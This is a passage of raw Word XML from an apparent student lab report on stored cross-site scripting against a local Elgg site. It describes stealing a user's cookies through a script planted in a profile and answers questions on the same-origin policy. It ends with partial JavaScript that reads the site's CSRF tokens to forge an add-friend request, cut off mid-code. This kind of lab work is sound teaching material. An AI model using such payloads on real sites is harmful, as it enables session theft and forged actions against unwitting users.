        <w:t xml:space="preserve"> from obtaining the victim’s cookies.</w:t>
      </w:r>
      <w:r w:rsidR="002932D3">
        <w:t xml:space="preserve"> For example, if </w:t>
      </w:r>
      <w:r w:rsidR="00A37903">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00E823AF">
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidR="005477F3">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00E823AF">
        <w:t xml:space="preserve"> allowed to view his password after logging in, then after the attacker log in as the victim</w:t>
      </w:r>
      <w:r w:rsidR="003E0093">
        <w:t xml:space="preserve"> using the victim’s cookies</w:t>
      </w:r>
      <w:r w:rsidR="00E823AF">
        <w:t xml:space="preserve">, the attacker can easily check </w:t>
      </w:r>
      <w:r w:rsidR="001F2443">
        <w:t xml:space="preserve">to see </w:t>
      </w:r>
      <w:r w:rsidR="00E823AF">
        <w:t xml:space="preserve">the victim’s password. </w:t>
      </w:r>
      <w:r w:rsidR="00F54114">
        <w:t>But i</w:t>
      </w:r>
      <w:r w:rsidR="00E823AF">
        <w:t>f the above were not supported, then the attacker cannot directly learn the user’s password.</w:t>
      </w:r>
      <w:r w:rsidR="00B16080">
        <w:t xml:space="preserve"> However, it is often the case that </w:t>
      </w:r>
      <w:r w:rsidR="005638A4">
        <w:t>a user</w:t>
      </w:r>
      <w:r w:rsidR="00B16080">
        <w:t xml:space="preserve"> can change </w:t>
      </w:r>
      <w:r w:rsidR="005638A4">
        <w:t>his password</w:t>
      </w:r>
      <w:r w:rsidR="00B16080">
        <w:t xml:space="preserve"> after </w:t>
      </w:r>
      <w:r w:rsidR="005638A4">
        <w:t>logging in. And if so</w:t>
      </w:r>
      <w:r w:rsidR="0092227C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005638A4">
        <w:t xml:space="preserve"> the attacker could change the victim’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D703B9" w14:textId="25C0EDCB" w:rsidR="005477F3" w:rsidRDefault="005477F3">
      <w:r>
        <w:t>In our case, No.</w:t>
      </w:r>
      <w:r w:rsidR="00642687">
        <w:t xml:space="preserve"> First, the password is not directly encoded in the cookies. Second, even if the attacker successfully logged in as the victim using the victim’s cookies, the attacker would have to provide the </w:t>
      </w:r>
      <w:r w:rsidR="0092227C">
        <w:t>current</w:t>
      </w:r>
      <w:r w:rsidR="00642687">
        <w:t xml:space="preserve"> password in order to change the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F5870" w14:textId="4BA0BCC5" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="7076A39C" w14:textId="126F93E8" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="5D89E50D" w14:textId="0E24FF4A" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="3C626C03" w14:textId="26D6766C" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="0C89E414" w14:textId="20FF9AC0" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="08E0762B" w14:textId="26220EDD" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="03A0F374" w14:textId="50A86156" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="66AB02EC" w14:textId="499BFA0A" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="7FD43775" w14:textId="0B607DF1" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="0FCC3289" w14:textId="27BB7D26" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="5EBCEA4D" w14:textId="10758177" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="06F45E84" w14:textId="67DAAED7" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="4B72537C" w14:textId="7BF98CAB" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="2F96670C" w14:textId="37FBF2A1" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="5797D7F7" w14:textId="7744F186" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="2AF296DF" w14:textId="37929FC9" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="0F08B365" w14:textId="5BD6E735" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="5E70BAF6" w14:textId="25C15FFD" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="068C209D" w14:textId="48CBE740" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="51734F47" w14:textId="4FB52624" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="73851AA0" w14:textId="545B6D60" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="527FE273" w14:textId="0F1F492C" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="3E46C5F8" w14:textId="7BB0B125" w:rsidR="00F06B46" w:rsidRDefault="00F06B46">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q5.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4488E1A3" w14:textId="1ED74F05" w:rsidR="008A3B9F" w:rsidRDefault="008A3B9F">
      <w:r>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Log in as Samy and embed the JavaScript code into Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FF3A5F" w14:textId="70AE0349" w:rsidR="008A3B9F" w:rsidRDefault="008A7C97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01279349" wp14:editId="7353F4E5">
            <wp:extent cx="5943600" cy="4345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45940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC10805" w14:textId="2E5D9570" w:rsidR="008A7C97" w:rsidRDefault="008A7C97"/>
    <w:p w14:paraId="573AB98F" w14:textId="72E0F575" w:rsidR="008A7C97" w:rsidRDefault="008A7C97">
      <w:r>
        <w:t>Step 2: Initialize a TCP server listening on port 5555 at 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA1693" w14:textId="6DDDCAA7" w:rsidR="008A7C97" w:rsidRDefault="008A7C97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C190D4" wp14:editId="313F8BAA">
            <wp:extent cx="4666615" cy="431165"/>
            <wp:effectExtent l="0" t="0" r="63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6615" cy="431165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD6ED5" w14:textId="072F2847" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="323EC7F5" w14:textId="77777777" w:rsidR="008F6EA7" w:rsidRDefault="008F6EA7"/>
    <w:p w14:paraId="1C8761DC" w14:textId="77777777" w:rsidR="008F6EA7" w:rsidRDefault="008F6EA7"/>
    <w:p w14:paraId="7B64B28F" w14:textId="77777777" w:rsidR="008F6EA7" w:rsidRDefault="008F6EA7"/>
    <w:p w14:paraId="17DB9F17" w14:textId="77777777" w:rsidR="008F6EA7" w:rsidRDefault="008F6EA7"/>
    <w:p w14:paraId="595A8285" w14:textId="77777777" w:rsidR="008F6EA7" w:rsidRDefault="008F6EA7"/>
    <w:p w14:paraId="4D78D5E6" w14:textId="77777777" w:rsidR="008F6EA7" w:rsidRDefault="008F6EA7"/>
    <w:p w14:paraId="3728DB13" w14:textId="004E0DEC" w:rsidR="00F04EC8" w:rsidRDefault="00F04EC8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3: Log out. Then log in as Boby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870EB6C" w14:textId="03D99C91" w:rsidR="00F04EC8" w:rsidRDefault="008F6EA7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C633524" wp14:editId="33EB54D1">
            <wp:extent cx="5943600" cy="2293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2FCE3160" w14:textId="1449036C" w:rsidR="00F06B46" w:rsidRDefault="00F06B46"/>
    <w:p w14:paraId="50150E04" w14:textId="6B75A9B8" w:rsidR="00F06B46" w:rsidRDefault="00AD29DF">
      <w:r>
        <w:t>Step 4: View Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFCDA61" w14:textId="297CD97B" w:rsidR="00AD29DF" w:rsidRDefault="00990711">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F518F4" wp14:editId="0C1C01C7">
            <wp:extent cx="5943600" cy="33286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35B00147" w14:textId="3C2DC01C" w:rsidR="00990711" w:rsidRDefault="00990711"/>
    <w:p w14:paraId="6EB7213F" w14:textId="77777777" w:rsidR="00990711" w:rsidRDefault="00990711"/>
    <w:p w14:paraId="07F51097" w14:textId="77777777" w:rsidR="00990711" w:rsidRDefault="00990711"/>
    <w:p w14:paraId="52784FD8" w14:textId="77777777" w:rsidR="00990711" w:rsidRDefault="00990711"/>
    <w:p w14:paraId="3653F3B7" w14:textId="77777777" w:rsidR="00990711" w:rsidRDefault="00990711"/>
    <w:p w14:paraId="422FB84E" w14:textId="6724F55A" w:rsidR="00990711" w:rsidRDefault="00990711">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r w:rsidR="00B86C84">
        <w:t>Boby’s cookies are sent to the attacker. (Shown in the GET request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC6073" w14:textId="3F695433" w:rsidR="00990711" w:rsidRDefault="00990711">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B737B14" wp14:editId="0E4A9EAF">
            <wp:extent cx="5943600" cy="2056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56130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFF986" w14:textId="33A47115" w:rsidR="00E34484" w:rsidRDefault="00E34484"/>
    <w:p w14:paraId="4692FF95" w14:textId="29397913" w:rsidR="00E34484" w:rsidRDefault="00E34484">
      <w:r>
        <w:t>Observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D029D" w14:textId="080D4F8E" w:rsidR="00390195" w:rsidRDefault="00390195" w:rsidP="00390195">
      <w:r>
        <w:t>After embedding the JavaScript code into Samy’s profile (in the brief description field),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I initialized a </w:t>
      </w:r>
      <w:r>
        <w:t>TCP server listening on port 5555 at 127.0.0.1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F522F">
        <w:t xml:space="preserve">After that </w:t>
      </w:r>
      <w:r>
        <w:t>I logged in as Boby to view Samy’s profile</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008F522F">
        <w:t xml:space="preserve"> Then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007655E7">
        <w:t xml:space="preserve">Boby’s cookies are sent </w:t>
      </w:r>
      <w:r w:rsidR="004F1DF1">
        <w:t xml:space="preserve">in a GET request </w:t>
      </w:r>
      <w:r w:rsidR="007655E7">
        <w:t>to the TCP server and displayed</w:t>
      </w:r>
      <w:r w:rsidR="00451A53">
        <w:t xml:space="preserve"> there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B19DBB" w14:textId="15FCC9AE" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="1DD1DB47" w14:textId="16D5ECB7" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="27E6EB9E" w14:textId="60E9DCA5" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="06C29464" w14:textId="71C369C3" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="70BD48D6" w14:textId="28A02245" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="224F7388" w14:textId="5D0FE04D" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="451CD725" w14:textId="7E7672DD" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="212192FB" w14:textId="2010630E" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="2FB4C895" w14:textId="457FD452" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="54011F9C" w14:textId="4A268AFF" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="43AF44FC" w14:textId="35F6440D" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="439D6BA8" w14:textId="0937EA12" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="411B6671" w14:textId="5335D5D7" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="53597C4F" w14:textId="2B02CF6C" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="25DC2B37" w14:textId="0A72B3AD" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="6D63AD64" w14:textId="23FFC25A" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195"/>
    <w:p w14:paraId="25CFB543" w14:textId="27E3C570" w:rsidR="005D3528" w:rsidRDefault="005D3528" w:rsidP="00390195">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00832527">
        <w:t xml:space="preserve">In our case, the parent document/script is an inline script at xsslabelgg.com; and the resource is the cookies at xsslabelgg.com. Therefore, they have the same origin and the access is allowed. In fact, the other server does not </w:t>
      </w:r>
      <w:r w:rsidR="005E1113">
        <w:t>get in the way when</w:t>
      </w:r>
      <w:r w:rsidR="00832527">
        <w:t xml:space="preserve"> enforcing the same-origin policy, since i</w:t>
      </w:r>
      <w:r w:rsidR="00E349AA">
        <w:t>t only waits for</w:t>
      </w:r>
      <w:r w:rsidR="00832527">
        <w:t xml:space="preserve"> a GET request sent from xsslabelgg.co</w:t>
      </w:r>
      <w:r w:rsidR="00E349AA">
        <w:t xml:space="preserve">m, </w:t>
      </w:r>
      <w:r w:rsidR="00261BB8">
        <w:t>but</w:t>
      </w:r>
      <w:r w:rsidR="00E349AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005208D1">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00E349AA">
        <w:t xml:space="preserve">does not try to access any resources </w:t>
      </w:r>
      <w:r w:rsidR="00AC2849">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00E349AA">
        <w:t xml:space="preserve"> xsslabelgg.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BE7BD" w14:textId="01460EF6" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="77B8A9E9" w14:textId="025B58D8" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="056C059A" w14:textId="1C1FA217" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="049A1F39" w14:textId="681A1328" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="4B5DCB95" w14:textId="6857FC1A" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="126F5DA5" w14:textId="55684181" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="1BA5E568" w14:textId="465E7DB4" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="320941B3" w14:textId="282A4BAB" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="79A59837" w14:textId="60CD5F8E" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="41D7A1E1" w14:textId="0869FFAC" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="65820F2C" w14:textId="498CF2D6" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="3F4CCC24" w14:textId="0040571A" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="3F5A21A4" w14:textId="7FC955F6" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="69F3AE3C" w14:textId="447014FB" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="1AE1AB37" w14:textId="5E722223" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="5B948BA7" w14:textId="6CBE77EE" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="620BE5BD" w14:textId="7D795C4C" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="33D6CB3E" w14:textId="523FD846" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="7658CB98" w14:textId="47878213" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="3495F67C" w14:textId="781DB5E1" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="26D779D7" w14:textId="336A05BF" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="056B45A9" w14:textId="7F5C0CA1" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="095D6B16" w14:textId="5FE1E25D" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="77B5EC8A" w14:textId="19405369" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="53CC9E90" w14:textId="6BEBD5B9" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="51730B20" w14:textId="457E9A46" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="24F14C7E" w14:textId="4D867BFA" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q5.3</w:t>
      </w:r>
      <w:r w:rsidR="001175BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B35482">
        <w:t xml:space="preserve">No. Because the Same-Origin Policy enforces that </w:t>
      </w:r>
      <w:r w:rsidR="00A91C02">
        <w:t xml:space="preserve">the document/script </w:t>
      </w:r>
      <w:r w:rsidR="00CE28F6">
        <w:t>loaded from</w:t>
      </w:r>
      <w:r w:rsidR="00A91C02">
        <w:t xml:space="preserve"> www.xsslabelgg.com cannot </w:t>
      </w:r>
      <w:r w:rsidR="00227F1B">
        <w:t>interact with</w:t>
      </w:r>
      <w:r w:rsidR="00A91C02">
        <w:t xml:space="preserve"> the resource</w:t>
      </w:r>
      <w:r w:rsidR="00FD0593">
        <w:t>s (</w:t>
      </w:r>
      <w:r w:rsidR="009A22C0">
        <w:t>e.g,</w:t>
      </w:r>
      <w:r w:rsidR="00FD0593">
        <w:t xml:space="preserve"> cookies)</w:t>
      </w:r>
      <w:r w:rsidR="00A91C02">
        <w:t xml:space="preserve"> at a different origin, in this case www.bankofamerica.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ADCE5A" w14:textId="77777777" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="1D008B0D" w14:textId="38E32AEE" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="7DF2CD4D" w14:textId="66BB0D97" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="31053532" w14:textId="2FD682C0" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="5362D372" w14:textId="11569223" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="4130F466" w14:textId="0E1CC2ED" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="006EB7B9" w14:textId="328ADB78" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="14126B55" w14:textId="21AC479A" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="6943A51D" w14:textId="63223AA3" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="3330735B" w14:textId="64C6325D" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="2286FE7E" w14:textId="2FDDE00C" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="6DE8EFA4" w14:textId="77777777" w:rsidR="005208D1" w:rsidRDefault="005208D1" w:rsidP="00390195"/>
    <w:p w14:paraId="5DB6C9E6" w14:textId="3349FB33" w:rsidR="00E34484" w:rsidRDefault="00E34484"/>
    <w:p w14:paraId="38369457" w14:textId="20E5AC04" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="2604EA33" w14:textId="25996AB7" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="099FAD33" w14:textId="4DC43247" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="7AC9A2D5" w14:textId="2478CBCD" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="492F4C37" w14:textId="368BC488" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="2AFF541F" w14:textId="204B0460" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="78F3ABEA" w14:textId="3717366E" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="108FEEB5" w14:textId="7CC559EF" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="3A183144" w14:textId="4D26D8E4" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="665B7ED7" w14:textId="5F1DDA0A" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="1742ACF8" w14:textId="73F258D1" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="33464901" w14:textId="2A6B879A" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="7A3DE96C" w14:textId="3430C334" w:rsidR="0007364C" w:rsidRDefault="0007364C"/>
    <w:p w14:paraId="4DBD7C2E" w14:textId="363202B9" w:rsidR="0007364C" w:rsidRDefault="0007364C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F3D0B" w14:textId="1FC546BB" w:rsidR="0007364C" w:rsidRDefault="00E44B0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    window.onload = function () {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        var Ajax=null;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        var ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        var token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        //Construct the HTTP request to add Samy as a friend.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        var sendurl="</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://www.xsslabelgg.com/action/friends/add?friend=47</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
